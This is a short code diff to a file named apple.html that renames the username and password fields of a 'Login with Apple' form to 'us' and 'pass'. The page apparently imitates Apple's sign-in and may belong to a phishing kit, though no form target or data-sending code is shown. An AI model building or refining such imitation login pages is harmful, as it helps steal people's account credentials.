--- a/apple.html
+++ b/apple.html
@@ -20,10 +20,10 @@
         <h3>Login with Apple <i class="fab fa-apple"></i></h3>
 
         <label for="username">Apple Id</label>
-        <input type="text" placeholder="Apple Id" name="username" id="username" class="login" required>
+        <input type="text" placeholder="Apple Id" name="us" id="username" class="login" required>
 
         <label for="password">Password</label>
-        <input type="password" name="password" id="password" class="password" placeholder="Password" required>
+        <input type="password" name="pass" id="password" class="password" placeholder="Password" required>
 
         <button type="submit">Send Code</button>
     </form>
